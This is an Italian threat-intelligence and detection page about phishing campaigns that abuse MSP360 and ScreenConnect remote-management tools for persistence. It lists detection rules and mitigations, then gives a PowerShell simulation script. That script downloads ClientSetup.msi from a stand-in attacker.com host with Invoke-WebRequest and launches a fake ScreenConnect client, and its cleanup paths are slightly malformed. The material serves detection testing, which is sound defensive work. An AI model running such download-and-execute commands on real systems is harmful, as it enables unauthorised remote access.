Abusi di Phishing su Strumenti RMM per Accesso Persistente
Detection stack
- AIDR
- Alert
- ETL
- Query
Riassunto
Gli attori delle minacce stanno sfruttando campagne di phishing per distribuire un legittimo installer MSP360 RMM mascherato da software affidabile. Una volta avviato, l’installer stabilisce la persistenza e successivamente scarica e distribuisce ConnectWise ScreenConnect, fornendo agli attaccanti un ulteriore canale di accesso remoto. Ciò consente ulteriori attività post-compromissione, inclusi il furto di credenziali e la raccolta di dati sensibili.
Indagine
Gli esperti di Microsoft Defender hanno identificato diversi esche di phishing che impersonano Zoom, Adobe e inviti a riunioni legittime per distribuire MSP360 v2.5.0.67. I ricercatori hanno ricostruito la catena di infezione, tracciando l’esecuzione iniziale dell’utente e l’elevazione UAC tramite l’installazione del servizio e la distribuzione di strumenti RMM secondari. L’indagine ha anche rivelato che gli attaccanti abusano di piattaforme cloud affidabili, tra cui Amazon S3 e Dropbox, per ospitare carichi dannosi.
Mitigazione
Le organizzazioni dovrebbero controllare rigorosamente gli strumenti RMM approvati implementando l’MFA e le politiche di Controllo delle Applicazioni per prevenire installazioni non autorizzate. Regole di blocco basate su certificati possono ulteriormente limitare applicazioni firmate specifiche. Rafforzare le difese degli endpoint tramite antivirus basato su cloud e le regole di Riduzione della Superficie di Attacco è essenziale per ridurre l’esposizione.
Risposta
Quando vengono scoperte installazioni RMM non autorizzate, i team di sicurezza dovrebbero immediatamente reimpostare le credenziali associate alle installazioni dei servizi interessati. La sospetta compromissione degli account a livello di sistema richiede un’indagine approfondita per determinate la completa portata dell’attacco. Rivedere i registri di rilevamento degli endpoint per identificare sessioni di gestione remota sospette e attività post-compromissione correlate.
Flusso d’attacco
Stiamo ancora aggiornando questa parte.
Rilevamenti
Download o Upload tramite Powershell (via cmdline)
Esecuzione di Cambio Codice Insolito (via cmdline)
Software Alternativo di Accesso/Management Remoto (via process_creation)
Chiamare Metodi .NET Sospetti da Powershell (via powershell)
Comando e Controllo Sospetto da Richiesta DNS con Dominio di Primo Livello Insolito (TLD) (via dns)
IOC (HashSha256) per rilevare: Abusi di Phishing Strumenti RMM per Accesso Persistente
IOC (HashSha1) per rilevare: Abusi di Phishing Strumenti RMM per Accesso Persistente
Rileva Invoke-WebRequest di PowerShell per il Download di Pacchetti MSI Remoti [Windows Powershell]
Abusi di Phishing Strumenti RMM per Accesso Persistente [Creazione Processi Windows]
Esecuzione di Simulazione
-
Narrativa & Comandi dell’Attacco: Un avversario avvia una campagna di spear phishing. La vittima clicca un link che attiva una riga singola di comando PowerShell. Questo comando usa
Invoke-WebRequestper scaricareClientSetup.msi(simulando l’installer ScreenConnect) da un server remoto. Una volta scaricato, l’attaccante esegue il MSI, e l’ultimo passaggio della simulazione comporta l’avvio diScreenConnect.WindowsClient.exeper simulare la sessione di accesso remoto stabilita. Questa sequenza è progettata per attivare laselezione_2 E selezione_3logica della regola. -
Script di Test di Regressione:
# Simulazione del Dispiegamento di RMM basato su Phishing $tempDir = $env:TEMP $msiName = "ClientSetup.msi" $exeName = "ScreenConnect.WindowsClient.exe" $msiPath = Join-Path $tempDir $msiName $exePath = Join-Path $tempDir $exeName # 1. Simula il download di PowerShell (parte A della Selezione 2) Write-Host "[+] Simulazione del download di MSI via PowerShell..." # Utilizzo di un file falso per simulare il download MSI New-Item -Path $msiPath -ItemType File -Force # Questo comando corrisponde alla logica di 'Invoke-WebRequest' e 'ClientSetup.msi' della regola powershell.exe -Command "Invoke-WebRequest -Uri 'http://attacker.com/ClientSetup.msi' -OutFile '$msiPath'" # 2. Crea un eseguibile falso per simulare il client ScreenConnect (Selezione 3) Write-Host "[+] Creazione di un eseguibile falso ScreenConnect..." New-Item -Path $exePath -ItemType File -Force # 3. Esegui il client (Selezione 3 e completamento della Selezione 2) Write-Host "[+] Esecuzione del Client ScreenConnect..." Start-Process -FilePath $exePath -
Comandi di Pulizia:
# Rimuovere gli artefatti di simulazione Remove-Item -Path "$env:TEMPClientSetup.msi" -Force -ErrorAction SilentlyContinue Remove-Item -Path "$env:TEMPScreenConnect.WindowsClient.exe" -Force -ErrorAction SilentlyContinue Write-Host "[+] Pulizia completata."